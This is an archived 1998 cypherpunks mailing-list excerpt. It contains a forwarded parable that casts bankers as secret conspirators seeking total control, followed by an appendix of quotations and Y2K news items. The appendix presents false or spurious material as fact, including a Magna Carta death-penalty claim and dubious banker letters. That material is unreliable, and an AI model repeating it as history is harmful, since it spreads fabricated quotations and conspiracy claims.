>If it isn't, then software browsers (Netscape/IE) should
>be allowed to do it too.
>
>Perhaps Declan could investigate and get a story out of it.

He is off the grid until next week, at which point he starts working for
Wired News. We'l try to get something on this for Wednesday.

jtg


James Glave, News Editor, Wired News, http://www.wired.com  (415) 276-8430




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:38:30 +0800
To: cypherpunks@cyberpass.net
Subject: money parable
Message-ID: <199810070334.UAA26974@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message

Date: Mon, 5 Oct 1998 23:30:57 +0000
From: Paul Swann <pswann@easynet.co.uk>
Subject: I Want The Earth Plus 5%

I Want The Earth Plus 5%

Fabian was excited as he once more rehearsed his speech for the crowd
certain to turn up tomorrow. He had always wanted prestige and power and
now his dreams were going to come true. He was a craftsman working with
silver and gold, making jewelry and ornaments, but he became
dissatisfied with working for a living. He needed excitement, a
challenge, and now his plan was ready to begin.

For generations the people used the barter system. A man supported his
own family by providing all their needs or else he specialised in a
particular trade. Whatever surpluses he might have from his own
production, he exchanged or swapped for the surplus of others.

Market day was always noise and dusty, yet people looked forward to the
shouting and waving, and especially the companionship. It used to be a
happy place, but now there were too many people, too much arguing. There
was no time for chatting - a better system was needed.

Generally, the people had been happy, and enjoyed the fruits of their
work.

In each community a simple Government had been formed to make sure that
each person's freedoms and rights were protected and that no man was
forced to do anything against his will by any other man, or any group of
men.

This was the Government's one and only purpose and each Governor was
voluntarily supported by the local community who elected him.

However, market day was the one problem they could not solve. Was a
knife worth one or two baskets of corn? Was a cow worth more than a
wagon  and so on. No one could think of a better system.

Fabian had advertised, "I have the solution to our bartering problems,
and I invite everyone to a public meeting tomorrow."

The next day there was a great assembly in the town square and Fabian
explained all about the new system which he called "money". It sounded
good. "How are we to start?" the people asked.

"The gold which I fashion into ornaments and jewelry is an excellent
metal. It does not tarnish or rust, and will last a long time. I will
make some gold into coins and we shall call each coin a dollar." He
explained how values would work, and that "money" would be really a
medium for exchange - a much better system than bartering.

One of the Governors questioned, "Some people can dig gold and make
coins for themselves", he said.

"This would be most unfair", Fabian was ready with the answer. "Only
those coins approved by the Government can be used, and these will have
special marking stamped on them." This seemed reasonable and it was
proposed that each man be given an equal number. "But I deserve the
most," said the candle-maker. "Everyone uses my candles." "No", said the
farmer, "without food there is no life, surely we should get the most."
And so the bickering continued.

Fabian let them argue for a while and finally he said, "Since none of
you can agree, I suggest you obtain the number you require from me.
There will be no limit, except for your ability to repay. The more you
obtain, the more you must repay in one year's time. "And what will you
receive?" the people asked.

"Since I am providing a service, that is, the money supply, I am
entitled to payment for my work. Let us say that for every 100 pieces
you obtain, you repay me 105 for every year that you owe the debt. The 5
will be my charge, and I shall call this charge interest."

There seemed to be no other way, and besides, 5% seemed little enough
charge. "Come back next Friday and we will begin."

Fabian wasted no time. He made coins day and night, and at the end of
the week he was ready. The people were queued up at his shop, and after
the coins were inspected and approved by the Governors the system
commenced. Some borrowed only a few and they went off to try the new
system.

They found money to be marvelous, and they soon valued everything in
gold coins or dollars. The value they placed on everything was called a
"price", and the price mainly depended on the amount of work required to
produce it. If it took a lot of work the price was high, but if it was
produced with little effort it was quite inexpensive.

In one town lived Alan, who was the only watchmaker. His prices were
high because the customers were willing to pay just to own one of his
watches.

Then another man began making watches and offered them at a lower price
in order to get sales. Alan was forced to lower his prices, and in no
time at all prices came down, so that both men were striving to give the
best quality at the lowest price. This was genuine free competition.

It was the same with builders, transport operators, accountants,
farmers, in fact, in every endeavour. The customers always chose what
they felt was the best deal - they had freedom of choice. There was no
artificial protection such as licences or tariffs to prevent other
people from going into business. The standard of living rose, and before
long the people wondered how they had ever done without money.

At the end of the year, Fabian left his shop and visited all the people
who owed him money. Some had more than they borrowed, but this meant
that others had less, since there were only a certain number of coins
issued in the first place. Those who had more than they borrowed paid
back each 100 plus the extra 5, but still had to borrow again to carry
on. The others discovered for the first time that they had a debt.
Before he would lend them more money, Fabian took a mortgage over some
of their assets, and everyone went away once moreto try and get those
extra 5 coins whichalways seemed so hard to find.

No one realised that as a whole, the country could never get out of debt
until all the coins were repaid, but even then, there were those extra 5
on each 100 which had never been lent out at all. No one but Fabian
could see that it was impossible to pay the interest - the extra money
had never been issued, therefore someone had to miss out.

It was true that Fabian spent some coins, but he couldn't possibly spend
anything like 5% of the total economy on himself. There were thousands
of people and Fabian was only one. Besides, he was still a goldsmith
making a comfortable living.

At the back of his shop Fabian had a strongroom and people found it
convenient to leave some of their coins with him for safekeeping. He
charged a small fee depending on the amount of money, and the time it
was left with him. He would give the owner receipts for the deposit.

When a person went shopping, he did not normally carry a lot of gold
coins. He would give the shopkeeper one of the receipts to the value of
the goods he wanted to buy. Shopkeepers recognised the receipt as being
genuine and accepted it with the idea of taking it to Fabian and
collecting the appropriate amount in coins. The receipts passed from
hand to hand instead of the gold itself being transferred. The people
had great faith in the receipts - they accepted them as being as good as
coins.

Before long, Fabian noticed that it was quite unusual for anyone to
actually call for their gold coins.

He thought to himself, "Here I am in possession of all this gold and I
am still a hard working craftsman. It doesn't make sense. Why there are
dozens of people who would be glad to pay me interest for the use of
this gold which is lying here and rarely called for.

It is true, the gold is not mine - but it is in my possession, which is
all that matters. I hardly need to make any coins at all, I can use some
of the coins stored in the vault."

At first he was very cautious, only loaning a few at a time, and then
only on tremendous security. But gradually he became bolder, and larger
amounts were loaned.

One day, a large loan was requested. Fabian suggested, "Instead of
carrying all these coins we can make a deposit in your name, and then I
shall give you several receipts to the value of the coins." The borrower
agreed, and off he went with a bunch of receipts. He had obtained a
loan, yet the gold remained in the strong-room. After the client left,
Fabian smiled. He could have his cake and eat it too. He could "lend"
gold and still keep it in his possession.

Friends, strangers and even enemies needed funds to carry out their
businesses - and so long as they could produce security, they could
borrow as much as they needed. By simply writing out receipts Fabian was
able to "lend" money to several times the value of gold in his
strong-room, and he was not even the owner of it. Everything was safe so
long as the real owners didn't call for their gold and the confidence of
the people was maintained.

He kept a book showing the debits and credits for each person - the
lending business was proving to be very lucrative indeed.

His social standing in the community was increasing almost as fast as
his wealth. He was becoming a man of importance, he commanded respect.
In matters of finance, his very word was like a sacred pronouncement.

Goldsmiths from other towns became curious about his activities and one
day they called to see him. He told them what he was doing, but was very
careful to emphasize the need for secrecy. If their plan was exposed,
the scheme would fail, so they agreed to form their own secret alliance.

Each returned to his own town and began to operate as Fabian had taught.

People now accepted the receipts as being as good as gold itself, and
many receipts were deposited for safe keeping in the same way as coins.
When a merchant wished to pay another for goods, he simply wrote a short
note instructing Fabian to transfer money from his account to that of
the second merchant. It took Fabian only a few minutes to adjust the
figures.

This new system became very popular, and the instruction notes were
called "checks".

Late one night, the goldsmiths had another secret meeting and Fabian
revealed a new plan. The next day they called a meeting with all the
Governors, and Fabian began. "The receipts we issue have become very
popular. No doubt, most of you Governors are using them and you find
them very convenient." They nodded in agreement and wondered what the
problem was. "Well", he continued, "some receipts are being copied by
counterfeiters. This practice must be stopped."

The Governors became alarmed. "What can we do?" they asked. Fabian
replied, "My suggestion is this - first of all, let it be the
Government's job to print new notes on a special paper with very
intricate designs, and then each note to be signed by the chief
Governor. We goldsmiths will be happy to pay the printing costs, as it
will save us a lot of time writing out receipts". The Governors
reasoned, "Well, it is our job to protect the people against
counterfeiters and the advice certainly seems like a good idea." So they
agreed to print the notes.

"Secondly," Fabian said, "some people have gone prospecting and are
making their own gold coins. I suggest that you pass a law so that any
person who finds gold nuggets must hand them in. Of course, they will be
reimbursed with notes and coins." The idea sounded good and without too
much thought about it, they printed a large number of crisp new notes.
Each note had a value printed on it - $1, $2, $5, $10 etc. The small
printing costs were paid by the goldsmiths.

The notes were much easier to carry and they soon became accepted by the
people. Despite their popularity however, these new notes and coins were
used for only 10% of transactions. The records showed that the check
system accounted for 90% of all business.

The next part of his plan commenced. Until now, people were paying
Fabian to guard their money. In order to attract more money into the
vault Fabian offered to pay depositors 3% interest on their money.

Most people believed that he was re-lending their money out to borrowers
at 5%, and his profit was the 2% difference. Besides, the people didn't
question him as getting 3% was far better than paying to have the money
guarded.

The volume of savings grew and with the additional money in the vaults,
 Fabian was able to lend $200, $300, $400 sometimes up to $900 for every
$100 in notes and coins that he held in deposit. He had to be careful
not to exceed this nine to one ratio, because one person in ten did
require the notes and coins for use.

If there was not enough money available when required, people would
become suspicious, especially as their deposit books showed how much
they had deposited. Nevertheless, on the $900 in book figures that
Fabian loaned out by writing checks himself, he was able to demand up to
$45 in interest, i.e. 5% on $900. When the loan plus interest was
repaid, i.e. $945, the $900 was cancelled out in the debit column and
Fabian kept the $45 interest. He was therefore quite happy to pay $3
interest on the original $100 deposited which had never left the vaults
at all. This meant that for every $100 he held in deposits, it was
possible to make 42% profit, most people believing he was only making
2%. The other goldsmiths were doing the same thing. They created money
out of nothing at the stroke of a pen, and then charged interest on top
of it.

True, they didn't coin money, the Government actually printed the notes
and coins and gave it to the goldsmiths to distribute. Fabian's only
expense was the small printing fee. Still, they were creating credit
money out of nothing and charging interest on top of it. Most people
believed that the money supply was a Government operation. They also
believed that Fabian was lending them the money that someone else had
deposited, but it was very strange that no one's deposits ever decreased
when a loan was advanced. If everyone had tried to withdraw their
deposits at once, the fraud would have been exposed.

When a loan was requested in notes or coins, it presented no problem.
Fabian merely explained to the Government that the increase in
population and production required more notes, and these he obtained for
the small printing fee.

One day a thoughtful man went to see Fabian. "This interest charge is
wrong", he said. "For every $100 you issue, you are asking $105 in
return. The extra $5 can never be paid since it doesn't exist.

Farmers produce food, industry manufacturers goods, and so on, but only
you produce money. Suppose there are only two businessmen in the whole
country and we employ everyone else. We borrow $100 each, we pay $90 out
in wages and expenses and allow $10 profit (our wage). That means the
total purchasing power is $90 + $10 twice, i.e. $200. Yet to pay you we
must sell all our produce for $210. If one of us succeeds and sells all
his produce for $105, the other man can only hope to get $95. Also, part
of his goods cannot be sold, as there is no money left to buy them.

He will still owe you $10 and can only repay this by borrowing more. The
system is impossible."

The man continued, "Surely you should issue 105, i.e. 100 to me and 5 to
you to spend. This way there would be 105 in circulation, and the debt
can be repaid." Fabian listened quietly and finally said, "Financial
economics is a deep subject, my boy, it takes years of study. Let me
worry about these matters, and you look after yours. You must become
more efficient, increase your production, cut down on your expenses and
become a better businessman. I am always willing to help in these
matters."

The man went away still unconvinced. There was something wrong with
Fabian's operations and he felt that his questions had been avoided.

Yet, most people respected Fabian's word - "He is the expert, the
others must be wrong. Look how the country has developed, how our
production has increased - we must be better off."

To cover the interest on the money they had borrowed, merchants were
forced to raise their prices. Wage earners complained that wages were
too low. Employers refused to pay higher wages, claiming that they would
be ruined. Farmers could not get a fair price for their produce.
Housewives complained that food was getting too dear. And finally some
people went on strike, a thing previously unheard of. Others had become
poverty stricken and their friends and relatives could not afford to
help them. Most had forgotten the real wealth all around - the fertile
soils, the great forests, the minerals and cattle. They could think only
of the money which always seemed so scarce. But they never questioned
the system. They believed the Government was running it.

A few had pooled their excess money and formed "lending" or "finance"
companies. They could get 6% or more this way, which was better than the
3% Fabian paid, but they could only lend out money they owned - they did
not have this strange power of being able to create money out of nothing
by merely writing figures in books.

These finance companies worried Fabian and his friends somewhat, so they
quickly set up a few companies of their own. Mostly, they bought the
others out before they got going. In no time, all the finance companies
were owned by them, or under their control.

The economic situation got worse. The wage earners were convinced that
the bosses were making too much profit. The bosses said that their
workers were too lazy and weren't doing an honest day's work, and
everyone was blaming everyone else.The Governors could not come up with
an answer and besides, the immediate problem seemed to be to help the
poverty stricken.

They started up welfare schemes and made laws forcing people to
contribute to them. This made many people angry - they believed in the
old-fashioned idea of helping one's neighbour by voluntary effort.

"These laws are nothing more than legalised robbery. To take something
off a person against his will, regardless of the purpose for which it is
to be used, is no different to stealing." But each man felt helpless and
was afraid of the jail sentence which was threatened for failing to pay.
These welfare schemes gave some relief, but before long the problem was
back and more money was needed to cope. The cost of these schemes rose
higher and higher and the size of the Government grew.

Most of the Governors were sincere men trying to do their best. They
didn't like asking for more money from their people and finally, they
had no choice but to borrow money from Fabian and his friends. They had
no idea how they were going to repay. Parents could no longer afford to
pay teachers for their children. They couldn't pay doctors. And
transport operators were going out of business.

One by one the government was forced to take these operations over.
Teachers, doctors and many others became public servants.

Few obtained satisfaction in their work. They were given a reasonable
wage, but they lost their identity. They became small cogs in a giant
machine.

There was no room for personal initiative, little recognition for
effort, their income was fixed and advancement came only when a superior
retired or died.

In desperation, the governors decided to seek Fabian's advice. They
considered him very wise and he seemed to know how to solve money
matters. He listened to them explain all their problems, and finally he
answered, "Many people cannot solve their own problems - they need
someone to do it for them. Surely you agree that most people have the
right to be happy and to be provided with the essentials of life. One of
our great sayings is "all men are equal" - is it not?"

Well, the only way to balance things up is to take the excess wealth
from the rich and give it to the poor. Introduce a system of taxation.
The more a man has, the more he must pay. Collect taxes from each person
according to his ability, and give to each according to his need.
Schools and hospitals should be free for those who cannot afford them "

He gave them a long talk on high sounding ideals and finished up with,
"Oh, by the way, don't forget you owe me money. You've been borrowing
now for quite some time. The least I can do to help, is for you to just
to pay me the interest. We'll leave the capital debt owing, just pay me
the interest."

They went away, and without giving Fabian's philosophies any real
thought, they introduced the graduated income tax - the more you earn,
the higher your tax rate. No one liked this, but they either paid the
taxes or went to jail.

Merchants were forced once again to raise their prices. Wage earners
demanded higher wages forcing many employers out of business, or to
replace men with machinery. This caused additional unemployment and
forced the Government to introduce further welfare and handout schemes.

Tariffs and other protection devices were introduced to keep some
industries going just to provide employment. A few people wondered if
the purpose of the production was to produce goods or merely to provide
employment.

As things got worse, they tried wage control, price control, and all
sorts of controls. The Government tried to get more money through sales
tax, payroll tax and all sorts of taxes. Someone noted that from the
wheat farmer right through to the housewife, there were over 50 taxes on
a loaf of bread.

"Experts" arose and some were elected to Government, but after each
yearly meeting they came back with almost nothing achieved, except for
the news that taxes were to be "restructured", but overall the total tax
always increased.

Fabian began to demand his interest payments, and a larger and larger
portion of the tax money was being needed to pay him.

Then came party politics - the people started arguing about which group
of Governors could best solve the problems. They argued about
personalities, idealism, party labels, everything except the real
problem. The councils were getting into trouble. In one town the
interest on the debt exceeded the amount of rates which were collected
in a year. Throughout the land the unpaid interest kept increasing -
interest was charged on unpaid interest.

Gradually much of the real wealth of the country came to be owned or
controlled by Fabian and his friends and with it came greater control
over people. However, the control was not yet complete. They knew that
the situation would not be secure until every person was controlled.

Most people opposing the systems could be silenced by financial
pressure, or suffer public ridicule. To do this Fabian and his friends
purchased most of the newspapers, T.V. and radio stations and he
carefully selected people to operate them. Many of these people had a
sincere desire to improve the world, but they never realised how they
were being used. Their solutions always dealt with the effects of the
problem, never the cause.

There were several different newspapers - one for the right wing, one
for the left wing, one for the workers, one for the bosses, and so on.
It didn't matter much which one you believed in, so long as you didn't
think about the real problem. Fabian's plan was almost at its completion
- - - the whole country was in debt to him. Through education and the media,
he had control of people's minds. They were able to think and believe
only what he wanted them to.

After a man has far more money than he can possibly spend for pleasure,
what is left to excite him? For those with a ruling class mentality, the
answer is power - raw power over other human beings. The idealists were
used in the media and in Government, but the real controllers that
Fabian sought were those of the ruling class mentality.

Most of the goldsmiths had become this way. They knew the feeling of
great wealth, but it no longer satisfied them. They needed challenge and
excitement, and power over the masses was the ultimate game.

They believed they were superior to all others. "It is our right and
duty to rule. The masses don't know what is good for them. They need to
be rallied and organised. To rule is our birthright."

Throughout the land Fabian and his friends owned many lending offices.
True, they were privately and separately owned. In theory they were in
competition with each other, but in reality they were working very
closely together. After persuading some of the Governors, they set up an
institution which they called the Money Reserve Centre. They didn't even
use their own money to do this - they created credit against part of the
money out of the people's deposits.

This Institution gave the outward appearance of regulating the money
supply and being a Government operation, but strangely enough, no
Governor or public servant was ever allowed to be on the Board of
Directors.

The Government no longer borrowed directly from Fabian, but began to use
a system of I.O.U.'s to the Money Reserve Centre. The security offered
was the estimated revenue from next year's taxes. This was in line with
Fabian's plan - removing suspicion from himself to an apparent
Government operation. Yet, behind the scenes, he was still in control.

Indirectly, Fabian had such control over the Government that they were
forced to do his bidding. He boasted, "Let me control the nation's money
and I care not who makes its laws." It didn't matter much which group of
Governors were elected. Fabian was in control of the money, the life
blood of the nation.

The Government obtained the money, but interest was always charged on
every loan. More and more was going out in welfare and handout schemes,
and it was not long before the Government found it difficult to even
repay the interest, let alone the capital.

And yet there were people who still asked the question, "Money is a
man-made system. Surely it can be adjusted to serve, not to rule?" But
these people became fewer and their voices were lost in the mad scrabble
for the non-existent interest.

The adminstrations changed, the party labels changed, but the major
policies continued. Regardless of which Government was in "power",
Fabian's ultimate goal was brought closer each year. The people's
policies meant nothing. They were being taxed to the limit, they could
pay no more. Now the time was ripe for Fabian's final move.

10% of the money supply was still in the form of notes and coins. This
had to be abolished in such a way as not to arouse suspicion. While the
people used cash, they were free to buy and sell as they chose - they
still had some control over their own lives.

But it was not always safe to carry notes and coins. Checks were not
accepted outside one's local community, and therefore a more convenient
system was looked forward to. Once again Fabian had the answer. His
organisation issued everyone with a little plastic card showing the
person's name, photograph and an identification number. When this card
was presented anywhere, the storekeeper phoned the central computer to
check the credit rating. If it was clear, the person could buy what he
wanted up to a certain amount.

At first people were allowed to spend a small amount on credit, and if
this was repaid within a month, no interest was charged. This was fine
for the wage earner, but what businessman could even begin? He had to
set up machinery, manufacture the goods, pay wages etc. and sell all his
goods and repay the money. If he exceeded one month, he was charged a
1.5% for every month the debt was owed. This amounted to over 18% per
years.

Businessmen had no option but to add the 18% onto the selling price.
Yet this extra money or credit (the 18%) had not been loaned out to
anyone. Throughout the country, businessmen were given the impossible
task of repaying $118 for every $100 they borrowed - but the extra $18
had never been created at all.

Yet Fabian and his friends increased their standing in society. They
were regarded as pillars of respectability. Their pronouncements on
finance and economics were accepted with almost religious conviction.

Under the burden of ever increasing taxes, many small businesses
collapsed. Special licenses were needed for various operations, so that
the remaining ones found it very difficult to operate. Fabian owned and
controlled all of the big companies which had hundreds of subsidiaries.
These appeared to be in competition with each other, yet he controlled
them all. Eventually all competitors were forced out of business.
Plumbers, panel beaters, electricians and most other small industries
suffered the same fate - they were swallowed up by Fabian's giant
companies which all had Government protections.

Fabian wanted the plastic cards to eliminate notes and coins. His plan
was that when all notes were withdrawn, only businesses using the
computer card system would be able to operate.

He planned that eventually some people would misplace their cards and be
unable to buy or sell anything until a proof of identify was made. He
wanted a law to be passed which would give him ultimate control - a law
forcing everyone to have their identification number tattooed onto their
hand. The number would be visible only under a special light, linked to
a computer. Every computer would be linked to a giant central computer
so that Fabian could know everything about everyone.

________________________________________________________

The story you have read is of course, fiction. But if you found it to be
disturbingly close to the truth and would like to know who Fabian is in
real life, a good starting point is a study on the activities of the
English goldsmiths in the 16th & 17th centuries.

For example, The Bank of England began in 1694. King William of Orange
was in financial difficulties as a result of a war with France. The
Goldsmiths "lent him" 1.2 million pounds (a staggering amount in those
days) with certain conditions:

a.The interest rate was to be 8%. It must be remembered that Magna Carta
stated that the charging or collecting of interest carried the death
penalty.

b.The King was to grant the goldsmiths a charter for the bank which gave
them the right to issue credit.

Prior to this, their operations of issuing receipts for more money than
they held in deposits was totally illegal. The charter made it legal.

In 1694 William Patterson obtained the Charter for the Bank of England.

(c) Larry Hannigan, Australia


~Quotations~

Encyclopaedia Britannica, 14th Edition - "Banks create credit. It is a
mistake to suppose that bank credit is created to any extent by the
payment of money into the banks. A loan made by a bank is a clear
addition to the amount of money in the community."

~

Lord Acton, Lord Chief Justice of England, 1875 - "The issue which has
swept down the centuries and which will have to be fought sooner or
later is the People v. The Banks."

~

Mr Reginald McKenna, when Chairman of the Midland Bank in London - "I
am afraid that ordinary citizens will not like to be told that the banks
can, and do, create and destroy money. And they who control the credit
of the nation direct the policy of governments, and hold in the hollow
of their hands the destiny of the people.

~

Mr Phillip A. Benson, President of the American Bankers' Association,
June 8 1939 - "There is no more direct way to capture control of a
nation than through its credit (money) system."

~

USA Banker's Magazine, August 25 1924 - "Capital must protect itself in
every possible manner by combination and legislation. Debts must be
collected, bonds and mortgages must be foreclosed as rapidly as possible.
When, through a process of law, the common people lose their homes
they will become more docile and more easily governed through the
influence of the strong arm of government, applied by a central power of
wealth under control of leading financiers.

This truth is well known among our principal men now engaged in forming
an imperialism of Capital to govern the world.

By dividing the voters through the political party system, we can get
them to expend their energies in fighting over questions of no
importance. Thus by discreet action we can secure for ourselves what has
been so well planned and so successfully accomplished."

~

Sir Denison Miller - During an interview in 1921, when he was asked if
he, through the Commonwealth Bank, had financed Australia during the
First World War for $700 million, he replied; "Such was the case, and I
could have financed the country for a further like sum had the war
continued." Asked if that amount was available for productive purposes
in this time of peace, he answered "Yes".

~

>From "Hand Over Our Loot, No. 2, by Len Clampett:

"There are four things that must be available for paid work to take
place:

*The work to be done.
*The materials to do the work.
*The labor to do the work.
*The money to pay for the work to be done.

If any of those four things are missing, no paid work can take place.
It is a naturally self-regulating system. If there is work to be done,
and the material is available and the labour willing, all we have to do
is create the money. Quite simple."

Ask yourself why it was that depressions happened. All that went
missing from the community was the money to buy goods and services. The
labour was still available. The work to be done was still there. The
materials had not disappeared, and the goods were readily available in
the shops, or could be produced but for the want of money.

~

Extract from a letter written by Rothschild Bros of London to a New York
firm of bankers on 25 June 1863:

"The few who can understand the System (Cheque Money and Credits) will
either be so interested in its profits, or so dependent on its favours,
that there will be no opposition from that class. While on the other
hand, the great body of people mentally incapable of comprehending the
tremendous advantage that capital derives from the system, will bear its
burdens without complaint and perhaps without even suspecting that the
system is inimical (hostile, hurtful) to their interests.

~

The following quotation was reprinted in the Idaho Leader, USA, 26
August 1924, and has been read into Hansard twice: by John Evans MP, in
1926, and by M.D. Cowan M.P., in the Session of 1930-1931.

In 1891 a confidential circular was sent to American bankers and their
agents, containing the following statements:

"We authorise our loan agents in the western States to loan our funds on
real estate, to fall due on September 1st 1894, and at no time
thereafter.

On September 1, 1894, we will not renew our loans under any
consideration.

On September 1st we will demand our money - we will foreclose and become
mortgagees in possession.

We can take two-thirds of the farms west of the Mississippi and
thousands of them east of the great Mississippi as well, at our own
price.

We may as well own three-fourths of the farms of the west and the money
of the country.

Then the farmers will become tenants, as in England."

~

>From "Hand Over Our Loot, No. 2"

"In the United States, the issuing of money is controlled by the Federal
Reserve Board. This is not a government department but a board of
private bankers.Most of us would believe that the Federal Reserve is a
federal arm of the national government.This is not trueIn 1913
President Woodrow Wilson signed the document that created the Federal
Reserve, and committed the American people to debt slavery until such
time as they awake from their slumber and overthrow this vicious
tyranny."

The understanding of this issue of money into the community can be best
illustrated by equating money in the economy with tickets in a railway
system. The tickets are printed by a printer who is paid for his work.
The printer never claims the ownership of the tickets  And we can never
imagine a railway company refusing to give passengers seats on a train
because it is out of tickets. By this same token, a government should
never refuse people the access to normal commerce and trade by claiming
it is out of money."

Suppose the government borrows $10 million. It only costs the bankers a
few hundred dollars to actually produce the funds, and a little more to
do the book-keeping. Do you think it is fair that our citizens should
struggle to keep their homes and families together, while the bankers
grow fat on these profits?

Credit created by a Government-owned bank is better than credit created
by private banks, because there is no need to recover the money from
people by way of taxes, and there is no interest attached to inflate the
cost. The public work completed with the credit by the Government bank
is the asset that replaces the money created when the work is finished.

None of our problems will disappear until we correct the creation,
supply and circulation of money. Once the money problem is solved,
everything else will fall into place.

Each of us can help to turn this ship around:

*The first thing is to teach people. VERY FEW know about or understand
this information yet. Please pass this information on to those on and
off the net.

*Research this subject for yourself to increase your understanding.

*Join with others who want to return the control of government to the
people. Remember - they are 'public SERVANTS'! We are not their servant.
They should do OUR bidding.

*Regardless of your political leanings, encourage your local Member to
investigate and correct our money system. (They probably need to be
educated too!). You can do this by email, letter, telephone or personal
discussion.

*Legislators receive an average of only 100 letters on any given issue.
So if you write you opinion and get others to write, say 25 letters, you
send a strong message. (Have a letter writing evening).

*To contact members of Congress or the House of Representatives go to
http://www.hugnet.com/Congress.htm

FURTHER INFORMATION

All You Were Never Told About the US Monetary System

http://www.moneymaker.com/money/frbhist.htm

Billions for the Bankers

www.parascope.com/mx/fedm.htm

Please advise us of other noteworthy links that you know of.



"None of our problems will disappear until we correct the creation,
supply and circulation of money. Once the money problem is solved,
everything else will fall into place."

I Want The Earth Plus 5%
http://health.microworld.com/html/plus_5_.html

"None of our problems will disappear until we correct the creation,
supply and circulation of money. Once the money problem is solved,
everything else will fall into place."

I Want The Earth Plus 5%
http://health.microworld.com/html/plus_5_.html




- - --------------29E97873D749AEAF8665B844--


- ------- End of Forwarded Message


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:39:15 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Y2K- a futurist view: Society not resilient enough to withstand
Message-ID: <199810070334.UAA27032@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "A.C." <angie@computerhut.net>
Subject: IP: Y2K- a futurist view: Society not resilient enough to withstand
Date: Sun, 04 Oct 1998 21:26:27 -0700
To: ignition-point@majordomo.pobox.com

change + 2 more related articles.
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: "A.C." <angie@computerhut.net>

"However, he warns that our present economic and institutional=20
structures have milked communities and individuals of their=20
resilience to handle major and abrupt change such as Y2K may unleash."
>>
>
>Watershed for life as we know it
>By JOHN MACLEAY

>29 Sep '98
>
>ROBERT Theobald is a futurist who sees the year 2000 computer glitch=20
>as a potential watershed for global civilisation.=20
>
>Theobald, a British-born economist based in the US, says the year=20
>2000 - or Y2K - computer bug will have as big an impact on the global=20
>economy as the oil shocks of the 1970s.=20
>
>On a more sobering note, Y2K is already shaping up as the biggest=20
>technological fix in history. It will cost the US alone at least=20
>$US600 billion ($1034 billion) and possibly $US1 trillion - double=20
>what it spent on the Vietnam War when adjusted for inflation.=20
>
>Theobald, who for 37 years has advocated the need for change to a=20
>more sustainable economy, says Y2K just might be that catalyst, given=20
>the "inertia" of the current system.=20
>
>But he says that how Y2K will change our lives will depend largely on=20
>the degree to which governments and individuals prepare themselves=20
>between now and December 31 next year.=20
>
>"For me, Y2K is only the beginning of the shocks that are going to=20
>come as we begin to realise that technology does not resolve all of=20
>our problems," Theobald says.=20
>
>Theobald, who is in Australia to promote his latest book, Reworking=20
>Success, says that if handled successfully, Y2K could lead to a more=20
>decentralised economy and political decision-making process.=20
>
>However, he warns that our present economic and institutional=20
>structures have milked communities and individuals of their=20
>resilience to handle major and abrupt change such as Y2K may unleash.=20
>
>
>Theobald says community resilience will determine whether Y2K is=20
>treated as a natural disaster or whether it will be seen as another=20
>technological blunder by those above.=20
>
>Theobald's big fear is that large-scale anger caused by Y2K=20
>disruptions could lead to a breakdown in social order, especially in=20
>the larger US cities, which will be the hardest areas to organise for=20
>Y2K at a neighbourhood and sub-neighbourhood level.=20
>
>"I believe the core issue on (handling) this Y2K thing is to start at=20
>the sub-neighbourhood level so that you can say you know who will=20
>need things.=20
>
>"If we don't do anything, the chances of a major breakdown in public=20
>order, which has already been seen in Indonesia and elsewhere around=20
>the world in one way or another, is a very real threat.=20
>
>"And without far more intelligence being put in to handle this, I'd=20
>say a global slump is a very real possibility, and a significant=20
>collapse is not off the cards either."=20
>
>However, while Theobald canvasses the dark side of the millennium=20
>glitch, he also dissociates himself from the so-called cyber-
>survivalists. These are people, mostly in the US, who are prepared to=20
>ride out the Y2K bug by stocking food and hiding away in isolation.=20
>
>Theobald has been putting his words into action by working closely=20
>with his local neighbourhood in Spokane, Washington State, on Y2K=20
>preparedness.=20
>
>His efforts were recognised last year by the Institute for Social=20
>Innovation in Britain, which awarded him a prize.=20
>
>The institute's other recipient was former computer programmer Paloma=20
>O'Reilly, founder of the Cassandra Project, a community-based Y2K=20
>preparedness group that has been examining and preparing for self-
>sufficiency in all areas that could be millennium-glitch affected,=20
>including power, water and food distribution.=20
>
>"What we do as individuals, as societies and communities over the=20
>next few months will make an enormous difference to how serious Y2K=20
>becomes," says Theobald.=20
>
>"This is a fairly established position. I'm one person among many.=20
>
>"When you consider the very well established companies and the=20
>enormous sums of money being spent on this, what I say is not out of=20
>the ordinary.=20
>
>"But what disturbs most is that the dominant message in our culture=20
>at the moment is not about Y2K preparedness."=20
---------------------------------------------------------------------

Boston Top Stories

Spotlight Boston October 2, 1998 =A0=20

Texas city stages test of `Y2K' doomsday effects=20

By Chris Newton/Associated Press=20

A cold front was icing streets and causing power outages. A riot at a=20
prison outside town was using up valuable police resources. To make=20
matters worse, the 911 emergency system was broken.

The nightmare scene didn't really happen, but Lubbock officials=20
imagined it did Wednesday as part of a test of how the city could=20
react if, as many fear, computers driving vital public systems fail=20
to recognize the year 2000.

The west Texas city of more than 180,000 people didn't test any=20
equipment but rather conducted a drill to see how city personnel=20
responded to mock crises. It was called the first such citywide=20
simulation of the problem in the nation.

City manager Bob Cass, scheduled to testify about the experience=20
Friday before a U.S. Senate committee, said the clear lesson was that=20
cities risk being blindsided if they don't work on contingency plans=20
for the worst-case ``Y2K'' scenario.

``This is the one disaster that we know exactly when it could occur,=20
but it's also the one disaster that we have no idea how bad it will=20
be,'' Cass said. ``One thing that sticks out in my mind is that there=20
is the potential for so many things to go wrong all at once.''

Some computer scientists fear the Y2K bug could cause water systems=20
to shut down, traffic lights to go haywire or life-support systems to=20
fail. When a Chrysler plant ran a Y2K test on a computer system, it=20
was discovered that security doors were stuck closed.

The Lubbock experiment coupled such effects with mock emergencies=20
that would make for an extra-busy night at the police department.

``Our simulation took into account things like slick roads and=20
traffic accidents that would be standard fare for New Year's Eve,''=20
Cass said.

The test was essentially a role-playing game.

Exactly what or when the ``disasters'' would occur was kept secret=20
until the drills started Wednesday evening. The only thing announced=20
was a four-hour window, starting at 5 p.m., when anything could=20
happen.

